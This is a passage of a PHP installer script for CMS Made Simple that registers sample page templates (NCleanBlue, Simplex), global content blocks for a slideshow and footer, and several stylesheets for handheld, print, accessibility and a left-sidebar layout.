Block called "footer" *}\n          <div class="block cms core-float-left">\n            {global_content name='footer'}\n          </div>\n          \n          <span class="util-clearb">&nbsp;</span>\n        </div>\n      </div>\n{* End Footer *}\n    </div>\n{* End Div *}\n  </body>\n</html>
EOT;
$template = new CmsLayoutTemplate();
$template->set_name('NCleanBlue'); // id = 22
$template->set_owner(1);
$template->set_content($txt);
$template->set_description('This one is using a new menu template so we can style the drop down for the children pages, using an image for the second ul going from the top down, it has an extra li at the bottom of the child pages ul <li class="separator once" style="list-style-type: none;">&nbsp; </li> this is used to hold the bottom image.');
$template->set_type($page_template_type);
$template->save();
$ncleanblue_theme->add_template($template);
$template_list[$template->get_name()] = $template->get_id();


$txt = <<<EOT
{strip}\r\n{* used for page specific data or logic in Edit Content -> Logic *}\r\n{process_pagedata}\r\n\r\n{* ================\r\n   THEME LOGIC\r\n   ================ *}\r\n    \r\n{* With cms_lang_info we retrieve current language information, assign gives us \$nls variable we can work with *}\r\n{cms_lang_info assign='nls'}\r\n{* assigned url to theme related folder so we do not have to type full path each time *}\r\n{\$theme_path = "{uploads_url}/simplex"}\r\n{* assigned content tag, now we have all smarty variables available anywhere in template *}\r\n{* assigned title tag to a variable which we can override with a module entry title for example *}\r\n{title assign='main_title'}\r\n{content assign='main_content'}\r\n{* assigned prev and next links so we don't have empty html tags if there is no previous or next page *}\r\n{cms_selflink dir='previous' assign='prev_page'}\r\n{cms_selflink dir='next' assign='next_page'}\r\n\r\n{* ensure that the smarty variables we created are copied to global scope for use elsewhere in the template *}\r\n{share_data scope=parent vars='nls,theme_path,main_title,main_content,prev_page,next_page' scope=global}\r\n\r\n{* using strip as we don't want useless whitespace, especially not before doctype *}\r\n{/strip}<!doctype html>\r\n<!--[if IE 8]>         <html lang='{\$nls->htmlarea()}' dir='{\$nls->direction()}' class='lt-ie9'> <![endif]-->\r\n<!--[if gt IE 8]><!--> <html lang='{\$nls->htmlarea()}' dir='{\$nls->direction()}'> <!--<![endif]-->\r\n    <head>\r\n        <meta charset='{\$nls->encoding()}' />\r\n        {metadata} {* Don't remove this! Metadata is entered in Site Admin/Global settings. *}\r\n        <title>{\$main_title nocache} - {sitename}</title>\r\n        <meta name='HandheldFriendly' content='True' />\r\n        <meta name='MobileOptimized' content='320' />\r\n        <meta name='viewport' content='width=device-width, initial-scale=1' />\r\n        <meta http-equiv='cleartype' content='on' />\r\n        <meta name='msapplication-TileImage' content='{\$theme_path}/images/icons/cmsms-152x152.png' />\r\n        <meta name='msapplication-TileColor' content='#5C5A59' />\r\n        {if isset(\$canonical)}<link rel='canonical' href='{\$canonical}' />{elseif isset(\$content_obj)}<link rel='canonical' href='{\$content_obj->GetURL()}' />{/if} {* See in news detail template how cannonical url can be assigned from module *}\r\n        {cms_stylesheet} {* This is how all the stylesheets attached to this template are linked to *}\r\n        <link href='//fonts.googleapis.com/css?family=Noto+Sans:400,700,400italic|Oswald:700' rel='stylesheet' type='text/css' />\r\n        <link rel='apple-touch-icon-precomposed' sizes='152x152' href='{\$theme_path}/images/icons/cmsms-152x152.png' />\r\n        <link rel='apple-touch-icon-precomposed' sizes='120x120' href='{\$theme_path}/images/icons/cmsms-120x120.png' />\r\n        <link rel='apple-touch-icon-precomposed' sizes='72x72' href='{\$theme_path}/images/icons/cmsms-76x76.png' />\r\n        <link rel='apple-touch-icon-precomposed' href='{\$theme_path}/images/icons/cmsms-60x60.png' />\r\n        <link rel='shortcut icon' sizes='196x196' href='{\$theme_path}/images/icons/cmsms-196x196.png' />\r\n        <link rel='shortcut icon' href='{\$theme_path}/images/icons/cmsms-60x60.png' />\r\n        <link rel='icon' href='{\$theme_path}/images/icons/favicon_cms.ico' type='image/x-icon' />\r\n        {cms_selflink dir='start' rellink='1'} {* Relational links for interconnections between pages, good for accessibility and Search Engine Optmization *}\r\n        {cms_selflink dir='prev' rellink='1'}\r\n        {cms_selflink dir='next' rellink='1'}\r\n        <!--[if lt IE 9]>\r\n            <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>\r\n            <script src="//css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script>\r\n        <![endif]-->\r\n    </head>\r\n    <body id='boxed' class='container page-wrapper page-{\$page_alias} page-{\$content_id}'>\r\n        <!-- #wrapper (wrapping content in a box) -->\r\n        <div class='row' id='wrapper'>\r\n            <!-- accessibility links, jump to nav or content -->\r\n            <ul class="visuallyhidden">\r\n                <li>{anchor anchor='nav' title='Skip to navigation' accesskey='n' text='Skip to navigation'}</li>\r\n                <li>{anchor anchor='main' title='Skip to content' accesskey='s' text='Skip to content'}</li>\r\n            </ul>\r\n            <!-- accessibility //-->\r\n            <!-- .top (top section of page containing logo, navigation search...) -->\r\n            <header class='top inner-section'>\r\n                <div class='row header'>\r\n                    <!-- .logo (cmsms logo on the left side) -->\r\n                    <div class='logo four-col'>\r\n                        <a href='{root_url}' title='{sitename}'>\r\n                            <img src='{\$theme_path}/images/cmsmadesimple-logo.png' width='227' height='59' alt='{sitename}' />\r\n                            <span class='palm'></span>\r\n                        </a>\r\n                    </div>\r\n                    <!-- .logo //-->\r\n                    <!-- .main-navigation (main navigation on the right side) -->\r\n                    <nav class='main-navigation eight-col cf noprint' id='nav' role='navigation'>\r\n                        {Navigator loadprops='0' template='Simplex Main Navigation'} {* A Navigator module, database Template *}\r\n                    </nav>\r\n                    <!-- .main-navigation //-->\r\n                </div>\r\n                <!-- .header-bottom (bottom part of header containing catchphrase and search field) -->\r\n                <div class='row header-bottom'>\r\n                    <section class='phrase cf'>\r\n                        <span class='seven-col phrase-text'>Power for professionals<br class='lt-768' /> Simplicity for End Users</span>\r\n                        {Search|strip formtemplate='Simplex Search'} {* Search module using custom template in Design Manager, you should use resultpage parameter for search results (see module help) *}\r\n                    </section>\r\n                </div>\r\n                <!-- .header-bottom //-->\r\n                <!-- .banner (banner area for a slider or teaser image) -->\r\n                {global_content name='Simplex Slideshow'}\r\n                <!-- .banner //-->\r\n            </header>\r\n            <!-- .top //-->\r\n            <!-- .content-wrapper (wrapping div for content area) -->\r\n            <main role='main' class='content-wrapper inner-section'>\r\n                <div class='row'>\r\n                    <!-- .content-inner (display content first) -->\r\n                    <div class='content-inner eight-col push-four'>\r\n                        <!-- .content-top (breadcrumbs) -->\r\n                        <div class='content-top cf' itemscope itemtype='http://data-vocabulary.org/Breadcrumb'>\r\n                            {Navigator action='breadcrumbs'} {* you can create own breadcrumbs template as well and include it with template parameter *}\r\n                            <span class='title-border' aria-hidden='true'></span>\r\n                        </div>\r\n                        <!-- .content-top //-->\r\n                        <!-- .content (actual content with title and content tags) -->\r\n                        <article class='content' id='main'>\r\n                            <h1>{\$main_title nocache} </h1> {* title tag *}\r\n                                {\$main_content nocache} {* content entered in page editor area, variable is assigned on top in template logic, using nocache as variables are cached with Smarty cache on *}\r\n                        </article>\r\n                        <!-- .content //-->\r\n                    </div>\r\n                    <!-- .content-inner //-->\r\n                    <!-- .sidebar (then show sidebar) -->\r\n                    <aside class='sidebar four-col pull-eight'>\r\n                        {* sample of using News Module tag for summary of latest two articles, remember if News page is deleted you should change detailpage parameter *}\r\n                        {module_available module='News' assign='havenews'}{if \$havenews}{cms_module module=News summarytemplate='Simplex News Summary' number='2' detailtemplate='Simplex News Detail'}{/if} {* You cannot use the short form of the module call, i.e: {News} in this type of expression *}\r\n                    </aside>\r\n                    <!-- .sidebar //-->\r\n                    <div class='cf eight-col push-four'>\r\n                        {if !empty(\$prev_page)}<span class='previous'>{\$prev_page nocache}</span>{/if}\r\n                        {if !empty(\$next_page)}<span class='next'>{\$next_page nocache}</span>{/if}\r\n                    </div>\r\n                </div>\r\n            </main>\r\n            <!-- .content-wrapper //-->\r\n            <!-- .footer (footer area) -->\r\n            <footer class='footer inner-section'>\r\n                <span class='back-top'><a href='{anchor anchor='main' onlyhref='1'}' id='scroll-top'><i class='icon-arrow-up' aria-hidden='true'></i></a></span>\r\n                <div class='row'>\r\n                    <section class='eight-col push-four noprint'>\r\n                        <nav class='footer-navigation row'>\r\n                            {Navigator template='Simplex Footer Navigation' excludeprefix='home' number_of_levels='2' loadprops='0'}\r\n                        </nav>\r\n                    </section> \r\n                    <section class='four-col pull-eight copyright'>\r\n                        {global_content|strip name='Simplex Footer'} {* generic Design Manager template *}\r\n                    </section>\r\n                </div>\r\n            </footer>\r\n        <!-- #wrapper //--> \r\n        </div>\r\n    {cms_jquery exclude='ui,nestedSortable,json,migrate' append='uploads/simplex/js/jquery.sequence-min.js,uploads/simplex/js/functions.min.js'}{strip}\r\n    {* if you are using some older jQuery plugin that relies on deprecated and removed functions that are no longer supported\r\n       in jQuery 1.11.0 try removing "migrate" from exclude list which will include jQuery Migrate 1.2.1 Plugin.\r\n       For more information about removed functions see: http://jquery.com/upgrade-guide/1.9/ *}{/strip}\r\n    </body>\r\n</html>
EOT;
$template = new CmsLayoutTemplate();
$template->set_name('Simplex');
$template->set_owner($admin_user->id);
$template->set_content($txt);
$template->set_description('A HTML5 based responsive template');
$template->set_type($page_template_type);
$template->set_type_dflt(TRUE);
$template->save();
$simplex_theme->add_template($template);
$template_list[$template->get_name()] = $template->get_id();

$txt = <<<EOT
{strip}\r\n\r\n{* A simple Smarty array for our slideshow *}\r\n{\$slides = []}\r\n\r\n{\$slides.0.heading = 'Power for professionals'}\r\n{\$slides.0.subheading = 'Simplicity for end Users'}\r\n{\$slides.0.image = 'palm-logo.png'}\r\n\r\n{\$slides.1.heading = 'Faster &amp; Easier'}\r\n{\$slides.1.subheading = 'Website management'}\r\n{\$slides.1.image = 'mate-zimple.png'}\r\n\r\n{\$slides.2.heading = 'Flexible &amp; Powerful'}\r\n{\$slides.2.subheading = 'Manage your Website anywhere and anytime'}\r\n{\$slides.2.image = 'mobile-devices-scene.png'}\r\n\r\n{\$slides.3.heading = 'Secure &amp; Robust'}\r\n{\$slides.3.subheading = 'Take control of your application'}\r\n{\$slides.3.image = 'browser-scene.png'}\r\n\r\n{* Markup *}\r\n<section class='banner row noprint' id='sx-slides' role='banner'>\r\n    <ul class="sequence-canvas">\r\n        {foreach \$slides as \$slide}\r\n        <li{if \$slide@first} class='animate-in'{/if}>\r\n            {if !empty(\$slide.heading)}<h2 class='title'>{\$slide.heading}</h2>{/if}\r\n            {if !empty(\$slide.subheading)}<h3 class='subtitle'>{\$slide.subheading}</h3>{/if}\r\n            {if !empty(\$slide.image)}<img class='image' src='{uploads_url}/simplex/teaser/{\$slide.image}' alt='{\$slide.heading|cms_escape:'htmlall'}' />{/if}\r\n        </li>\r\n        {/foreach}\r\n    </ul>\r\n</section>\r\n\r\n{/strip}
EOT;
$gcb_sx_slideshow = new CmsLayoutTemplate();
$gcb_sx_slideshow->set_name('Simplex Slideshow');
$gcb_sx_slideshow->set_type($gcb_template_type);
$gcb_sx_slideshow->set_owner($admin_user->id);
$gcb_sx_slideshow->set_description('A sample slider for Simplex Theme.
Note: required jQuery Framework is already included at the bottom of Simplex Page Template.
If any of Modules that you are going to use requires or adds additional jQuery Framework, remember to either remove jQuery Framework from Module template (for example Gallery module) or to move {cms_jquery} tag in Simplex Page Template to <head> section of template if needed.
All current Browser come with some kind of Developer Tools (usually F12 key) or you can also install Firebug in Firefox or Chrome, if some JavaScript function doesn\'t work your first step would be to open Developer Tools and look into console errors.');
$gcb_sx_slideshow->set_content($txt);
$gcb_sx_slideshow->save();
$simplex_theme->add_template($gcb_sx_slideshow);

$txt = <<<EOT
{* Logic *}\r\n{\$start_year = '2004'}\r\n{\$current_year = \$smarty.now|cms_date_format:'Y'}\r\n\r\n{* Template *}\r\n<ul class='social cf'>\r\n    <li class='twitter'><a title='Twitter' href='http://twitter.com/#!/cmsms'><i class='icon-twitter'></i><span class='visuallyhidden'>Twitter</span></a></li>\r\n    <li class='facebook'><a title='Facebook' href='https://www.facebook.com/cmsmadesimple'><i class='icon-facebook'></i><span class='visuallyhidden'>Facebook</span></a></li>\r\n    <li class='linkedin'><a title='LinkedIn' href='http://www.linkedin.com/groups?gid=1139537'><i class='icon-linkedin'></i><span class='visuallyhidden'>LinkedIn</span></a></li>\r\n    <li class='youtube'><a title='YouTube' href='http://www.youtube.com/user/cmsmadesimple'><i class='icon-youtube'></i><span class='visuallyhidden'>YouTube</span></a></li>\r\n    <li class='google'><a title='Google Plus' href='https://plus.google.com/+cmsmadesimple/posts'><i class='icon-google'></i><span class='visuallyhidden'>Google Plus</span></a></li>\r\n    <li class='pinterest'><a title='Pinterest' href='http://www.pinterest.com/cmsmadesimple/'><i class='icon-pinterest'></i><span class='visuallyhidden'>Pinterest</span></a></li>\r\n</ul>\r\n<p class='copyright-info'>&copy; Copyright {\$start_year}{if \$start_year !== \$current_year} - {\$current_year}{/if} - CMS Made Simple<br /> This site is powered by <a href='http://www.cmsmadesimple.org'>CMS Made Simple</a> version {cms_version}</p>
EOT;
$gcb_sx_footer = new CmsLayoutTemplate();
$gcb_sx_footer->set_name('Simplex Footer');
$gcb_sx_footer->set_type($gcb_template_type);
$gcb_sx_footer->set_owner($admin_user->id);
$gcb_sx_footer->set_description('Custom footer section template for Simplex Theme');
$gcb_sx_footer->set_content($txt);
$gcb_sx_footer->save();
$simplex_theme->add_template($gcb_sx_footer);
//
// Stylesheets
//
$css_list = array();
verbose_msg(ilang('install_stylesheets'));

$txt = <<<EOT
/*********************************************\nSample stylesheet for mobile and small screen handheld devices\n\nJust a simple layout suitable for smaller screens with less \nstyling cabapilities and minimal css\n\nNote: If you dont want to support mobile devices you can\nsafely remove this stylesheet.\n*********************************************/\n/* remove all padding and margins and set width to 100%. This should be default for handheld devices but its good to set these explicitly */\nbody {\nmargin:0;\npadding:0;\nwidth:100%;\n}\n\n/* hide accessibility noprint and definition */\n.accessibility,\n.noprint,\ndfn {\ndisplay:none;\n}\n\n/* dont want to download image for header so just set bg color */\ndiv#header,\ndiv#footer {\nbackground-color: #385C72;  \ncolor: #fff;\ntext-align:center;\n}\n\n/* text colors for header and footer */\ndiv#header a,\ndiv#footer a {\ncolor: #fff;\n}\n\n/* this doesnt look as nice, but takes less space */\ndiv#menu_vert ul li,\ndiv#menu_horiz ul li {\ndisplay:inline;\n}\n\n/* small border at the bottom to have some indicator */\ndiv#menu_vert ul,\ndiv#menu_horiz ul {\nborder-bottom:1px solid #fff;\n}\n\n/* save some space */\ndiv.breadcrumbs {\ndisplay:none;\n}
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Handheld');
$css->set_description('Stylesheet for older mobile devices');
$css->set_content($txt);
$css->set_media_types('handheld');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
/*\nSections that are hidden when printing the page. We only want the content printed.\n*/\n\n\nbody {\ncolor: #000 !important; /* we want everything in black */\nbackground-color:#fff !important; /* on white background */\nfont-family:arial; /* arial is nice to read ;) */\nborder:0 !important; /* no borders thanks */\n}\n\n/* This affects every tag */\n* {\nborder:0 !important; /* again no borders on printouts */\n}\n\n/* \nno need for accessibility on printout. \nMark all your elements in content you \ndont want to get printed with class="noprint"\n*/\n.accessibility,\n.noprint\n {\ndisplay:none !important; \n}\n\n/* \nremove all width constraints from content area\n*/\ndiv#content,\ndiv#main {\ndisplay:block !important;\nwidth:100% !important;\nborder:0 !important;\npadding:1em !important;\n}\n\n/* hide everything else! */\ndiv#header,\ndiv#header h1 a,\ndiv.breadcrumbs,\ndiv#search,\ndiv#footer,\ndiv#menu_vert,\ndiv#news,\ndiv.noprint,\ndiv.right49,\ndiv.left49,\ndiv#sidebar  {\n   display: none !important;\n}\n\nimg {\nfloat:none; /* this makes images cause a pagebreak if it doesnt fit on the page */\n}
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Print');
$css->set_description('Default stylesheet for print devices');
$css->set_content($txt);
$css->set_media_types('print');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
/* accessibility */\n/* menu links accesskeys */\nspan.accesskey {\n	text-decoration: none;\n}\n/* accessibility divs are hidden by default, text, screenreaders and such will show these */\n.accessibility, hr {\n/* position set so the rest can be set out side of visual browser viewport */\n	position: absolute;\n/* takes it out top side */\n	top: -999em;\n/* takes it out left side */\n	left: -999em;\n}\n/* definition tags are also hidden, these are also used for accessibility menu links */\ndfn {\n	position: absolute;\n	left: -1000px;\n	top: -1000px;\n	width: 0;\n	height: 0;\n	overflow: hidden;\n	display: inline;\n}\n/* end accessibility */\n/* wiki style external links */\n/* external links will have "(external link)" text added, lets hide it */\na.external span {\n	position: absolute;\n	left: -5000px;\n	width: 4000px;\n}\na.external {\n/* make some room for the image, css shorthand rules, read: first top padding 0 then right padding 12px then bottom then right */\n	padding: 0 12px 0 0;\n}\n/* colors for external links */\na.external:link {\n	color: #18507C;\n/* background image for the link to show wiki style arrow */\n	background: url([[root_url]]/uploads/NCleanBlue/external.gif) no-repeat 100% -100px;\n}\na.external:visited {\n	color: #18507C;\n/* a different color can be used for visited external links */\n/* Set the last 0 to -100px to use that part of the external.gif image for different color for active links external.gif is actually 300px tall, we can use different positions of the image to simulate rollover image changes.*/\n	background: url([[root_url]]/uploads/NCleanBlue/external.gif) no-repeat 100% -100px;\n}\na.external:hover {\n	color: #18507C;\n/* Set the last 0 to -200px to use that part of the external.gif image for different color on hover */\n	background: url([[root_url]]/uploads/NCleanBlue/external.gif) no-repeat 100% 0;\n	background-color: inherit;\n}\n/* end wiki style external links */\n/* clearing */\n/* clearfix is a hack for divs that hold floated elements. it will force the holding div to span all the way down to last floated item. We strongly recommend against using this as it is a hack and might not render correctly but it is included here for convenience. Do not edit if you dont know what you are doing*/\n.clearfix:after {\n	content: ".";\n	display: block;\n	height: 0;\n	clear: both;\n	visibility: hidden;\n}\n.clear {\n	height: 0;\n	clear: both;\n	width: 90%;\n	visibility: hidden;\n}\n#main .clear {\n	height: 0;\n	clear: right;\n	width: 90%;\n	visibility: hidden;\n}\n* html>body .clearfix {\n	display: inline-block;\n	width: 100%;\n}\n* html .clear {\n/* Hides from IE-mac \\*/\n	height: 1%;\n	clear: right;\n	width: 90%;\n/* End hide from IE-mac */\n}\n/* end clearing */
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Accessibility and cross-browser tools');
$css->set_description('Accessibility and cross-browser CSS rules attached to multiple Themes');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
/* browsers interpret margin and padding a little differently, we'll remove all default padding and margins and set them later on */\n* {\n	margin: 0;\n	padding: 0;\n}\n/*Set initial font styles*/\nbody {\n	text-align: left;\n	font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;\n	font-size: 75.01%;\n	line-height: 1em;\n}\n/*set font size for all divs, this overrides some body rules*/\ndiv {\n	font-size: 1em;\n}\n/*if img is inside "a" it would have borders, we don't want that*/\nimg {\n	border: 0;\n}\n/*default link styles*/\na, a:link a:active {\n/* set all links to have underline */\n	text-decoration: underline;\n/* css validation will give a warning if color is set without background color. this will explicitly tell this element to inherit bg colour from parent element */\n	background-color: inherit;\n/* this is a bluish color, you change this for all default link colors */\n	color: #18507C;\n}\na:visited {\n/* keeps the underline */\n	text-decoration: underline;\n	background-color: inherit;\n/* a different color is used for visited links */\n	color: #18507C;\n}\na:hover {\n/* remove underline on hover */\n	text-decoration: none;\n	background-color: inherit;\n/* using a different color makes the hover obvious */\n	color: #385C72;\n}\n/*****************basic layout *****************/\nbody {\n	margin: 0;\n	padding: 0;\n/* default text color for entire site*/\n	color: #333;\n/* you can set your own image and background color here */\n	background: #f4f4f4 url([[root_url]]/uploads/ngrey/body.png) repeat-x left top;\n}\ndiv#pagewrapper {\n/* min max width, IE wont understand these, so we will use java script magic in the <head> */\n	max-width: 99em;\n	min-width: 60em;\n/* now that width is set this centers wrapper */\n	margin: 0 auto;\n	background-color: #fefefe;\n	color: black;\n}\n/* header, we will hide h1 a text and replace it with an image, we assign a height for it so the image wont cut off */\ndiv#header {\n/* adjust according your image size */\n	height: 100px;\n	margin: 0;\n	padding: 0;\n/* you can set your own image here, will go behind h1 a image */\n	background: #f4f4f4 url([[root_url]]/uploads/ngrey/bg_banner.png) repeat-x left top;\n/* border just the bottom */\n	border-bottom: 1px solid #D9E2E6;\n}\ndiv#header h1 a {\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/logoCMS.png) no-repeat left top;\n/* this will make the "a" link a solid shape */\n	display: block;\n/* adjust according your image size */\n	height: 100px;\n/* this hides the text */\n	text-indent: -999em;\n/* old firefox would have shown underline for the link, this explicitly hides it */\n	text-decoration: none;\n}\ndiv#header h1 {\n	margin: 0;\n	padding: 0;\n/*these keep IE6 from pushing the header to more than the set size*/\n	line-height: 0;\n	font-size: 0;\n/* this will keep IE6 from flickering on hover */\n	background: url([[root_url]]/uploads/ngrey/logoCMS.png) no-repeat left top;\n}\ndiv#header h2 {\n/* this is where the site name is */\n	float: right;\n	line-height: 1.2em;\n/* this keeps IE6 from not showing the whole text */\n	font-size: 1.5em;\n/* keeps the size uniform */\n	margin: 35px 65px 0px 0px;\n/* adjust according your text size */\n	color: #f4f4f4;\n}\ndiv.crbk {\n/* sets all to 0 */\n	margin: 0;\n	padding: 0;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainrtup.gif) no-repeat right bottom;\n}\ndiv.breadcrumbs {\n/* CSS short hand rule first value is top then right, bottom and left */\n	padding: 1em 0em 1em 1em;\n/* its good to set font sizes to be relative, this way viewer can change his/her font size */\n	font-size: 90%;\n/* css shorthand rule will be opened to be "0px 0px 0px 0px" */\n	margin: 0px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainleftup.gif) no-repeat left bottom;\n}\ndiv.breadcrumbs span.lastitem {\n	font-weight: bold;\n}\ndiv#search {\n/* position for the search box */\n	float: right;\n/* enough width for the search input box */\n	width: 27em;\n	text-align: right;\n	padding: 0.5em 0 0.2em 0;\n	margin: 0 1em;\n}\n/* a class for Submit button for the search input box */\ninput.search-button {\n	border: none;\n	height: 22px;\n	width: 53px;\n	margin-left: 5px;\n	padding: 0px 2px 2px 0px;\n/* makes the hover cursor show, you can set your own cursor here */\n	cursor: pointer;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/search.gif) no-repeat center center;\n}\ndiv#content {\n/* some air above and under menu and content */\n	margin: 1.5em auto 2em 0;\n	padding: 0px;\n}\n/* this gets all the outside calls that were used on the div#main before  */\ndiv.back1 {\n/* this will give room for sidebar to be on the left side, make sure this number is bigger than sidebar width */\n	margin-left: 29%;\n/* and some air on the right */\n	margin-right: 2%;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainrt1.gif) no-repeat right top;\n}\n/* this is an IE6 hack, you may see these through out the CSS */\n* html div.back1 {\n/* unlike other browser IE6 needs float:right and a width */\n	float: right;\n	width: 69%;\n/* and we take this out or it will stop at the bottom  */\n	margin-left: 0%;\n/* and some air on the right */\n	margin-right: 10px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainrt1.gif) no-repeat right top;\n}\ndiv.back2 {\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainleft1.gif) no-repeat left top;\n}\ndiv.back3 {\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/wbtmleft.gif) no-repeat left bottom;\n}\ndiv#main {\n/* this is the last inside div so we set the space inside it to keep all content away from the edges of images/box */\n	padding: 10px 15px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/rtup.gif) no-repeat right bottom;\n}\ndiv.back #main {\n/* this is the last inside div so we set the space inside it to keep all content away from the edges of images/box */\n	padding: 10px 30px 1px 15px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/wbtmleft.gif) no-repeat left bottom;\n}\ndiv.back {\n/* this will give room for sidebar to be on the left side, make sure this space is bigger than sidebar width */\n	margin-left: 29%;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/wtopleft.gif) no-repeat left top;\n}\ndiv#sidebar {\n/* set sidebar left. Change to right, float: right; instead, but you will need to change the margins. */\n	float: left;\n/* sidebar width, if you change this change div.back and/or div.back1 margins */\n	width: 26%;\n/* FIX IE double margin bug */\n	display: inline;\n/* the 20px is on the bottom, insures space above footer if longer than content */\n	margin: 0px 0px 20px;\n	padding: 0px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainrt1.gif) no-repeat right top;\n}\ndiv#sidebara {\n	padding: 13px 15px 3px 0px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainrtup.gif) no-repeat right bottom;\n}\ndiv#sidebarb {\n	padding: 10px 10px 1px 0px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/mainrtup.gif) no-repeat right bottom;\n}\ndiv.footback {\n/* keep footer below content and menu */\n	clear: both;\n/* this sets 10px on right to let the right image show, the balance 10px left on next div */\n	padding: 0px 10px 0px 0px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/wfootrt.gif) no-repeat right top;\n}\ndiv#footer {\n/* this sets 10px on left to balance 10px right on last div */\n	padding: 0px 0px 0px 10px;\n/* color of text, the link color is set below */\n	color: #595959;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/wtopleft.gif) no-repeat left top;\n}\ndiv.leftfoot {\n	float: left;\n	width: 30%;\n	margin-left: 20px\n}\ndiv#footer p {\n/* sets different font size from default */\n	font-size: 0.8em;\n/* some air for footer */\n	padding: 1.5em;\n/* centered text */\n	text-align: center;\n	margin: 0;\n}\ndiv#footer p a {\n/* footer link would be same color as default we want it same as footer text */\n	color: #595959;\n}\n/* as we hid all hr for accessibility we create new hr with div class="hr" element */\ndiv.hr {\n	height: 1px;\n	padding: 1em;\n	border-bottom: 1px dotted black;\n	margin: 1em;\n}\n/* relational links under content */\ndiv.left49 {\n/* combined percentages of left+right equaling 100%  might lead to rounding error on some browser */\n	width: 70%;\n}\ndiv.right49 {\n	float: right;\n	width: 29%;\n/* set right to keep text on right */\n	text-align: right;\n}\n/********************CONTENT STYLING*********************/\n/* HEADINGS */\ndiv#content h1 {\n/* font size for h1 */\n	font-size: 2em;\n	line-height: 1em;\n	margin: 0;\n}\ndiv#content h2 {\n	color: #294B5F;\n/* font size for h2 the higher the h number the smaller the font size, most times */\n	font-size: 1.5em;\n	text-align: left;\n/* some air around the text */\n	padding-left: 0.5em;\n	padding-bottom: 1px;\n/* set borders around header */\n	border-bottom: 1px solid #899092;\n	border-left: 1.1em solid #899092;\n/* a larder than h1 line height */\n	line-height: 1.5em;\n/* and some air under the border */\n	margin: 0 0 0.5em 0;\n}\ndiv#content h3 {\n	color: #294B5F;\n	font-size: 1.3em;\n	line-height: 1.3em;\n	margin: 0 0 0.5em 0;\n}\ndiv#content h4 {\n	color: #294B5F;\n	font-size: 1.2em;\n	line-height: 1.3em;\n	margin: 0 0 0.25em 0;\n}\ndiv#content h5 {\n	color: #294B5F;\n	font-size: 1.1em;\n	line-height: 1.3em;\n	margin: 0 0 0.25em 0;\n}\nh6 {\n	color: #294B5F;\n	font-size: 1em;\n	line-height: 1.3em;\n	margin: 0 0 0.25em 0;\n}\n/* END HEADINGS */\n/* TEXT */\np {\n/* default p font size, this is set different in some other divs */\n	font-size: 1em;\n/* some air around p elements */\n	margin: 0 0 1.5em 0;\n	line-height: 1.4em;\n	padding: 0;\n}\nblockquote {\n	border-left: 10px solid #ddd;\n	margin-left: 10px;\n}\nstrong, b {\n/* explicit setting for these */\n	font-weight: bold;\n}\nem, i {\n/* explicit setting for these */\n	font-style: italic;\n}\n/* Wrapping text in <code> tags. Makes CSS not validate */\ncode, pre {\n/* css-3 */\n	white-space: pre-wrap;\n/* Mozilla, since 1999 */\n	white-space: -moz-pre-wrap;\n/* Opera 4-6 */\n	white-space: -pre-wrap;\n/* Opera 7 */\n	white-space: -o-pre-wrap;\n/* Internet Explorer 5.5+ */\n	word-wrap: break-word;\n	font-family: "Courier New", Courier, monospace;\n	font-size: 1em;\n}\npre {\n/* black border for pre blocks */\n	border: 1px solid #000;\n/* set different from surroundings to stand out */\n	background-color: #ddd;\n	margin: 0 1em 1em 1em;\n	padding: 0.5em;\n	line-height: 1.5em;\n	font-size: 90%;\n}\n/* Separating the divs on the template explanation page */\ndiv.templatecode {\n	margin: 0 0 2.5em;\n}\n/* END TEXT */\n/* LISTS */\n/* lists in content need some margins to look nice */\ndiv#main ul,\ndiv#main ol,\ndiv#main dl {\n	font-size: 1.0em;\n	line-height: 1.4em;\n	margin: 0 0 1.5em 0;\n}\ndiv#main ul li,\ndiv#main ol li {\n	margin: 0 0 0.25em 3em;\n}\n/* definition lists topics on bold */\ndiv#main dl {\n	margin-bottom: 2em;\n	padding-bottom: 1em;\n	border-bottom: 1px solid #c0c0c0;\n}\ndiv#main dl dt {\n	font-weight: bold;\n	margin: 0 0 0 1em;\n}\ndiv#main dl dd {\n	margin: 0 0 1em 1em;\n}\n/* END LISTS */
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Layout Left sidebar + 1 column');
$css->set_description('CSS rules used for Layout Left sidebar + 1 column Design');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
